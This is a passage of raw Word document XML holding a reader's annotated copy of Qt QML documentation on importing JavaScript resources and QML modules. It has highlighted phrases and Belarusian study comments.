        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>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 xml:space="preserve">a script </w:t>
      </w:r>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>with imports will not inherit imports from the QML document</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> which imported it (so accessing Component.errorString will fail, for example)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487A25" w:rsidRPr="00D815C8" w:rsidRDefault="00487A25" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">a script </w:t>
      </w:r>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>without imports will inherit imports from the QML document</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> which imported it (so accessing Component.errorString will succeed, for example)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487A25" w:rsidRPr="00D815C8" w:rsidRDefault="00487A25" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>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 xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>shared</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> script (i.e., defined as .pragma library) d</w:t>
      </w:r>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>oes not inherit imports from any QML documen</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>t even if it imports no other scripts or modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487A25" w:rsidRPr="00D815C8" w:rsidRDefault="00487A25" w:rsidP="00DE54A7">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The first semantic is conceptually correct, given that a particular script might be imported by any number of QML files. </w:t>
      </w:r>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The second semantic is retained for the purposes of backwards-compatibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The third semantic remains unchanged from the current semantics for shared scripts, but is clarified here in respect to the newly possible case (where the script imports other scripts or modules).</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highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using context of these three semantics.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C49D7" w:rsidRPr="008F15ED" w:rsidRDefault="00487A25" w:rsidP="00DE54A7">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>лепей зразумець першыя два правілы. Гэта значыць, у .</w:t>
      </w:r>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> файле будуць бачныя тыпы кмл дакумента, які імпартуе яго?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487A25" w:rsidRPr="00D815C8" w:rsidRDefault="00487A25" w:rsidP="008F15ED">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc483000539"/>
      <w:bookmarkStart w:id="90" w:name="_Toc483603899"/>
      <w:bookmarkStart w:id="91" w:name="_Toc483605119"/>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Importing a JavaScript Resource from Another JavaScript Resource</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
      <w:bookmarkEnd w:id="90"/>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w:rsidR="00487A25" w:rsidRPr="00D815C8" w:rsidRDefault="00487A25" w:rsidP="00487A25">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="24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 xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>JavaScript resource may import another</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the following fashion:</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"filename.js"</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as</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Qualifier</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487A25" w:rsidRPr="00D815C8" w:rsidRDefault="00487A25" w:rsidP="00487A25">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="24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For example:</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"factorial.js"</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as</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MathFunctions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487A25" w:rsidRPr="00D815C8" w:rsidRDefault="00487A25" w:rsidP="008F15ED">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc483000540"/>
      <w:bookmarkStart w:id="93" w:name="_Toc483603900"/>
      <w:bookmarkStart w:id="94" w:name="_Toc483605120"/>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Importing a QML Module from a JavaScript Resource</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
      <w:bookmarkEnd w:id="93"/>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w:rsidR="00487A25" w:rsidRPr="00D815C8" w:rsidRDefault="00487A25" w:rsidP="00487A25">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="24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A JavaScript resource may import a QML module in the following </w:t>
      </w:r>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fashion</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487A25" w:rsidRPr="00D815C8" w:rsidRDefault="00487A25" w:rsidP="00487A25">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import TypeNamespace MajorVersion</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MinorVersion as Qualifier</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487A25" w:rsidRPr="00D815C8" w:rsidRDefault="00487A25" w:rsidP="00487A25">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487A25" w:rsidRPr="00D815C8" w:rsidRDefault="00487A25" w:rsidP="00487A25">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">test </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as JsQtTest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487A25" w:rsidRPr="00D815C8" w:rsidRDefault="00487A25" w:rsidP="00487A25">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In particular, this may be useful in order to access functionality provided via a singleton type</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; see</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId57" w:anchor="qmlRegisterSingletonType" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlRegisterSingletonType</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() for more information. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Лепей зразумець сувязь з сінглетонам.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487A25" w:rsidRPr="00D815C8" w:rsidRDefault="00487A25" w:rsidP="00DE54A7">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The .import syntax doesn't work for scripts used in the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId58" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>WorkerScript</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00487A25" w:rsidRPr="00D815C8" w:rsidRDefault="00487A25" w:rsidP="008F15ED">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc483000541"/>
      <w:bookmarkStart w:id="96" w:name="_Toc483603901"/>
      <w:bookmarkStart w:id="97" w:name="_Toc483605121"/>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Including a JavaScript Resource from Another JavaScript Resource</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
      <w:bookmarkEnd w:id="96"/>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w:rsidR="004C49D7" w:rsidRPr="00D815C8" w:rsidRDefault="00487A25" w:rsidP="00DE54A7">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">When a JavaScript file is imported, it </w:t>
      </w:r>
      <w:r w:rsidRPr="000D2D52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must be imported with a qualifier</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The functions in that file are then accessible from the importing script via the qualifier (that is, as</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Qualifier.functionName(params)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">). Sometimes it is desirable to have the functions made available in the importing context </w:t>
      </w:r>
      <w:r w:rsidRPr="000D2D52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>without needing to qualify them</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and in this circumstance the</w:t>
